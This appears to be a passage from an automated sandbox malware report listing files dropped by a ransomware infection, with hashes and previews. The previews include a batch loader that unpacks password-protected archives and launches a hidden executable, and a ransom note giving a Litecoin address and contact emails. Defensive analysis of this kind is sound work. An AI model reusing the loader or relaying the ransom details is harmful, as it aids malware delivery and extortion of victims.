                                                                                                                                                                                                                                                SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\file.zip (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3473725
                                                                                                                                                                                                                                                Entropy (8bit):7.999948676888215
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:9b8s3/pc44zfeVeY45ZADJE7ZdXrYX+RyWGGdVPLv7+joMMPlHxNwNrRPXD3tI:LP0eQz5Zwm7ZdEOhdLrK0l2FpI
                                                                                                                                                                                                                                                MD5:045B0A3D5BE6F10DDF19AE6D92DFDD70
                                                                                                                                                                                                                                                SHA1:0387715B6681D7097D372CD0005B664F76C933C7
                                                                                                                                                                                                                                                SHA-256:94B392E94FA47D1B9B7AE6A29527727268CC2E3484E818C23608F8835BC1104D
                                                                                                                                                                                                                                                SHA-512:58255A755531791B888FFD9B663CC678C63D5CAA932260E9546B1B10A8D54208334725C14529116B067BCF5A5E02DA85E015A3BED80092B7698A43DAB0168C7B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:PK........n..Yd=,..5...5.....file_7.zipm..+]..E....`...._..'.....DXW|._6.Kau^.O....W.0.....fE....Q:.t`9.9"..c.... .[(2..[m{.`S.?8...w.v.{zo/a....E..L.1..<.....].@.....:...3?. k.5....H.=......0.A.,3p......_R.......[.7....j.Ba$v1AO.@q....x...u..9.k..z.p...5.....-(.b...y.........S.../..l.Q.....)....w..@...w;.;2.&Q.w.....Hn.3A.z.i..0i%A..E-7.....8....(.Z.A....k.......=.g.,......N.Yt`....)....T.....f..P.....u4ig.......B...~-7...Y]Ct.6.7..PS.Su7yx8...#.......B.3.f."....x.-u.....M.%.a.._\D.5.G....O.P....,b.;=.k[....4......SdS....gL.....X.......G...f.P....p.PS.~.P.}...X.7.+Ap.-.....^'..\.6..r.2.p.wd...dd....(..S..N..#.M....~..L..sjX...,..B.........-..R..~..A..B...MF..,.z.........lK.]<"..,...K.~..S.Z...p).......z..I..E.MG.M].....F.SY.p..1...sM7...B...l......g..V...q..p}$%iM....L...N...;.......}/Y8..&zAO&0..s.{.pR.A...Y`..Q.../n..,........z.&.k.`TU...7lv.xQ@~.'..H.S..y...n48......m....s1(.`.....,.n;j...CX.s..sN.L..q.u.G.....q.M..:..xI":Y.

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\main\main.bat

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014796001\bab5c1b6a6.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):440
                                                                                                                                                                                                                                                Entropy (8bit):5.0791308599041844
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:QUp+CF16g64CTFMj2LIQLvDHW7PCVGrMLvmuCogLKO8NerxVv:QUpNF16g632CkezWDCVGYTOLv8k7
                                                                                                                                                                                                                                                MD5:3626532127E3066DF98E34C3D56A1869
                                                                                                                                                                                                                                                SHA1:5FA7102F02615AFDE4EFD4ED091744E842C63F78
                                                                                                                                                                                                                                                SHA-256:2A0E18EF585DB0802269B8C1DDCCB95CE4C0BAC747E207EE6131DEE989788BCA
                                                                                                                                                                                                                                                SHA-512:DCCE66D6E24D5A4A352874144871CD73C327E04C1B50764399457D8D70A9515F5BC0A650232763BF34D4830BAB70EE4539646E7625CFE5336A870E311043B2BD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..&cls..@echo off..mode 65,10..title g3g34g34g34g43 (34g34g45h6hj56j56j)..md extracted..ren file.bin file.zip..call 7z.exe e file.zip -p24291711423417250691697322505 -oextracted ..for /l %%i in (7,-1,1) do (..call 7z.exe e extracted/file_%%i.zip -oextracted..)..ren file.zip file.bin..cd extracted..move "in.exe" ../..cd....rd /s /q extracted..attrib +H "in.exe"..start "" "in.exe"..cls..echo Launched 'in.exe'...pause..del /f /q "in.exe"..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\mozilla-temp-files\mozilla-temp-41

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                File Type:ISO Media, MP4 Base Media v1 [ISO 14496-12:2003]
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):0.4593089050301797
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:9SP0nUgwyZXYI65yFRX2D3GNTTfyn0Mk1iA:9SDKaIjo3UzyE1L
                                                                                                                                                                                                                                                MD5:D910AD167F0217587501FDCDB33CC544
                                                                                                                                                                                                                                                SHA1:2F57441CEFDC781011B53C1C5D29AC54835AFC1D
                                                                                                                                                                                                                                                SHA-256:E3699D9404A3FFC1AFF0CA8A3972DC0EF38BDAB927741E9F627C7C55CEA42E81
                                                                                                                                                                                                                                                SHA-512:F1871BF28FF25EE52BDB99C7A80AB715C7CAC164DCD2FD87E681168EE927FD2C5E80E03C91BB638D955A4627213BF575FF4D9EECAEDA7718C128CF2CE8F7CB3D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:... ftypisom....isomiso2avc1mp41....free....mdat..........E...H..,. .#..x264 - core 152 r2851 ba24899 - H.264/MPEG-4 AVC codec - Copyleft 2003-2017 - http://www.videolan.org/x264.html - options: cabac=1 ref=3 deblock=1:0:0 analyse=0x3:0x113 me=hex subme=7 psy=1 psy_rd=1.00:0.00 mixed_ref=1 me_range=16 chroma_me=1 trellis=1 8x8dct=1 cqm=0 deadzone=21,11 fast_pskip=1 chroma_qp_offset=-2 threads=4 lookahead_threads=1 sliced_threads=0 nr=0 decimate=1 interlaced=0 bluray_compat=0 constrained_intra=0 bframes=3 b_pyramid=2 b_adapt=1 b_bias=0 direct=1 weightb=1 open_gop=0 weightp=2 keyint=250 keyint_min=25 scenecut=40 intra_refresh=0 rc_lookahead=40 rc=crf mbtree=1 crf=23.0 qcomp=0.60 qpmin=0 qpmax=69 qpstep=4 ip_ratio=1.40 aq=1:1.00......e...+...s|.kG3...'.u.."...,J.w.~.d\..(K....!.+..;....h....(.T.*...M......0..~L..8..B..A.y..R..,.zBP.';j.@.].w..........c......C=.'f....gI.$^.......m5V.L...{U..%V[....8......B..i..^,....:...,..5.m.%dA....moov...lmvhd...................(...........

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014793001\b6866cbf49.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):32768
                                                                                                                                                                                                                                                Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs-1.js

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9816
                                                                                                                                                                                                                                                Entropy (8bit):5.5323081253820385
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qnaRtZYbBp6ihj4qyaaX86KakfGNBw8MJSl:degquOcwV0
                                                                                                                                                                                                                                                MD5:72E631CDC5B4127D54EAFB484B4E43D3
                                                                                                                                                                                                                                                SHA1:252C1774D233078675ABAD8F13DF1FC1EE3B7DA4
                                                                                                                                                                                                                                                SHA-256:58D057DB1A3CFF3E178A0509E956A1CCD2FB5C8115773764686EA6E947D7CFEA
                                                                                                                                                                                                                                                SHA-512:C421810480C65DB90554E7677601D15979311C6CE2E1BDC026BF2551A581DA6EC9A61090C075CE6E2B13B412D22468089A59799A9FC87DE357870C194A4068F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1809), with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9816
                                                                                                                                                                                                                                                Entropy (8bit):5.5323081253820385
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:qnaRtZYbBp6ihj4qyaaX86KakfGNBw8MJSl:degquOcwV0
                                                                                                                                                                                                                                                MD5:72E631CDC5B4127D54EAFB484B4E43D3
                                                                                                                                                                                                                                                SHA1:252C1774D233078675ABAD8F13DF1FC1EE3B7DA4
                                                                                                                                                                                                                                                SHA-256:58D057DB1A3CFF3E178A0509E956A1CCD2FB5C8115773764686EA6E947D7CFEA
                                                                                                                                                                                                                                                SHA-512:C421810480C65DB90554E7677601D15979311C6CE2E1BDC026BF2551A581DA6EC9A61090C075CE6E2B13B412D22468089A59799A9FC87DE357870C194A4068F8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):53
                                                                                                                                                                                                                                                Entropy (8bit):4.136624295551173
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AY:Y9KQOy6Lb1BA+9
                                                                                                                                                                                                                                                MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
                                                                                                                                                                                                                                                SHA1:B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
                                                                                                                                                                                                                                                SHA-256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
                                                                                                                                                                                                                                                SHA-512:076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:{"profile-after-change":true,"final-ui-startup":true}

                                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionCheckpoints.json.tmp

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):53
                                                                                                                                                                                                                                                Entropy (8bit):4.136624295551173
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:YVXKQJAyiVLQwJtJDBA+AY:Y9KQOy6Lb1BA+9
                                                                                                                                                                                                                                                MD5:EA8B62857DFDBD3D0BE7D7E4A954EC9A
                                                                                                                                                                                                                                                SHA1:B43BC4B3EA206A02EF8F63D5BFAD0C96BF2A3B2A
                                                                                                                                                                                                                                                SHA-256:792955295AE9C382986222C6731C5870BD0E921E7F7E34CC4615F5CD67F225DA
                                                                                                                                                                                                                                                SHA-512:076EE83534F42563046D25086166F82E1A3EC61840C113AEC67ABE2D8195DAA247D827D0C54E7E8F8A1BBF2D082A3763577587E84342EC160FF97905243E6D19
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:{"profile-after-change":true,"final-ui-startup":true}

                                                                                                                                                                                                                                                C:\Users\user\Contacts\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Desktop\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Documents\DVWHKMNFNN.png

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.8691805945535425
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:jD7/7BKDOD61N7+irb7HaVyW1B7hsOjmJrc0YXUZtwsTd:jLBK6Yh+w6Bdb4o0jZtw+
                                                                                                                                                                                                                                                MD5:79049AD17E7009620CF5D97F157A7F38
                                                                                                                                                                                                                                                SHA1:63AE9CD0D8EEFC36B6075F0CAF583E467956CC17
                                                                                                                                                                                                                                                SHA-256:F08F80B52C21795C77FE2AC8729053DF8E645614A569CF64B7C9249EDFC2E693
                                                                                                                                                                                                                                                SHA-512:00C022AD04F71A27D9156F429E8CF70A87BF7540954918E3DEE218BB086FEC68B23D6D016D5015A4C6D23D70AD6FE4670E367B4A85431F4EC0AB51D137F52A4B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:w.>.F.}...0..j.-l..M.?:.....`.^..>.|+.....T..v.....ij.....}C0m.....u...7.d.^(.....7..j.....'M.....-X...g`o.........T.$N....[:.? ..!...4.0..f..E.O[P.{.....'5}...9'..7n.._...Q.}..0;.5..]...W.P.Q.......D...2....T/.....E0...J.y.#\....he...Uz..7%l......H..0z....X.i..%bs...[B..3...$$H.>.v.O....pk3..M4.<.A...D....m.rm.8.".)|..GX..8.^8.....0j..i...V..DO.g......._....L......P..).^.K^.9...b....g.S..;..v4..ms)<4.)k..su.[.5...-..`..[.;..Q....H.}..f.jK.LM...'.>[.......h_X.Z.I.+.'.....M..p..$..]....S>]....^5..7..\.* ..H.P....%K..|lWZ<Ui...b)`r.x....I.JO....%......Z.9.J...A....>.a.c........D.'[.:...u.l..Ak...xT...f.G.c5_.P!PA..<=.....pO.@h].3..8.K.E.Y.u......\..X.u....[5.6.>G...N."...Y.....=..w...=..;@N\.c.^..<k]~.qR.|.n ..7P...."#.5u.........G...B.1"..[..".L./.@....j....M...V...p...7iM..L.u.Q.".=}.q..'0.......!..W].$.nR*....d........:.HVKW...b.....1d..gv..\<T.....K......^%E....n.N....K.K.A.u."f.....R....0.2..[&..~.$`..v.-(\..@.G.K.{.M.\....a{.}..

                                                                                                                                                                                                                                                C:\Users\user\Documents\DVWHKMNFNN.png.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.8691805945535425
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:jD7/7BKDOD61N7+irb7HaVyW1B7hsOjmJrc0YXUZtwsTd:jLBK6Yh+w6Bdb4o0jZtw+
                                                                                                                                                                                                                                                MD5:79049AD17E7009620CF5D97F157A7F38
                                                                                                                                                                                                                                                SHA1:63AE9CD0D8EEFC36B6075F0CAF583E467956CC17
                                                                                                                                                                                                                                                SHA-256:F08F80B52C21795C77FE2AC8729053DF8E645614A569CF64B7C9249EDFC2E693
                                                                                                                                                                                                                                                SHA-512:00C022AD04F71A27D9156F429E8CF70A87BF7540954918E3DEE218BB086FEC68B23D6D016D5015A4C6D23D70AD6FE4670E367B4A85431F4EC0AB51D137F52A4B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:w.>.F.}...0..j.-l..M.?:.....`.^..>.|+.....T..v.....ij.....}C0m.....u...7.d.^(.....7..j.....'M.....-X...g`o.........T.$N....[:.? ..!...4.0..f..E.O[P.{.....'5}...9'..7n.._...Q.}..0;.5..]...W.P.Q.......D...2....T/.....E0...J.y.#\....he...Uz..7%l......H..0z....X.i..%bs...[B..3...$$H.>.v.O....pk3..M4.<.A...D....m.rm.8.".)|..GX..8.^8.....0j..i...V..DO.g......._....L......P..).^.K^.9...b....g.S..;..v4..ms)<4.)k..su.[.5...-..`..[.;..Q....H.}..f.jK.LM...'.>[.......h_X.Z.I.+.'.....M..p..$..]....S>]....^5..7..\.* ..H.P....%K..|lWZ<Ui...b)`r.x....I.JO....%......Z.9.J...A....>.a.c........D.'[.:...u.l..Ak...xT...f.G.c5_.P!PA..<=.....pO.@h].3..8.K.E.Y.u......\..X.u....[5.6.>G...N."...Y.....=..w...=..;@N\.c.^..<k]~.qR.|.n ..7P...."#.5u.........G...B.1"..[..".L./.@....j....M...V...p...7iM..L.u.Q.".=}.q..'0.......!..W].$.nR*....d........:.HVKW...b.....1d..gv..\<T.....K......^%E....n.N....K.K.A.u."f.....R....0.2..[&..~.$`..v.-(\..@.G.K.{.M.\....a{.}..

                                                                                                                                                                                                                                                C:\Users\user\Documents\HTAGVDFUIE.jpg

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.875162901112043
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:fpcQhFXTiO5NFknjgyTxTkBwJ3Se7/tk66+NgBA1ar0jmJrc0YXUZtwsTI:fprDiO9kjnJP711jcAEO4o0jZtwv
                                                                                                                                                                                                                                                MD5:6C6E3AA390103EC7CCC0AB0636170506
                                                                                                                                                                                                                                                SHA1:510F9C86784FB3A73B63A8DAD78BB2C45B383BF1
                                                                                                                                                                                                                                                SHA-256:5546380197EAFA306C859CCF3C72FFCF582DC28C9337E0B5459FAD51DEFB1ED6
                                                                                                                                                                                                                                                SHA-512:D7547D667223F70396E09F430BA6AA7A9DAE10FCC03C180BA6DEE8002711CDF1166041495CEC92830AF9A2C1F4808B6B2530E381A6ACED1EE3C359F6849371DA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:....m.5~Lhy....V.P.eQ..D...4r...1.wd=+.rd.+...Yw.......{Cn5w{%.../.\...t.t..H.76\..........0[sKD2.4R..G.4..]Z....D.6..,...yks.m[!I...l.+|.......2.I.Qk$...y.5Z..[p.."{O.P....x....!.....C=.+.I..cr#..W.dF.6w.J.U.....b.?..e.a...^\.{.V._./...+m_.s....h...=.^..\.6r.....z..4...;z ..+.e].:.J..W...^..@.....E..=$.......v.V.;].h{.......=..m...8..|%..:...Y...A.R...'g.I".b......1.)N..........[.D'A.et.>......$..nA....OY...D.s(.(.i..w+.....,.....l..Z$.(.q.F.p.t...w..z...aJ.7=f..ds\..P~.5.j<.Vx7.*Z.9s...*...}..c..].5.....o.FE2..g_.p..&e.6.R.V..Z..B2....@.,.~..."..... .w<1...A...../%.)6.xf..>. .z[.#.3..2.T...Hg...G. .W.'/........8....(e.t.....)vLzl.....@h...6.........A..k........%0K(.L...]...sN..+p.D..@.D.../.dC....7..a..Y.o....f^.8#.../..sB...+.x..A.k@.e.w..kr..-\....".X..._.b.|.S..(...%...d..uX.t......._.b.q.%..X.3a.....-.......Ko...z.....?.n...oq.Af....HJ.c"..lu/.....m^...^.......m.....Na~.;q~.7.e.B..8P.....|....M..U.'.4. .CoZ.........>...&D

                                                                                                                                                                                                                                                C:\Users\user\Documents\HTAGVDFUIE.jpg.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.875162901112043
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:fpcQhFXTiO5NFknjgyTxTkBwJ3Se7/tk66+NgBA1ar0jmJrc0YXUZtwsTI:fprDiO9kjnJP711jcAEO4o0jZtwv
                                                                                                                                                                                                                                                MD5:6C6E3AA390103EC7CCC0AB0636170506
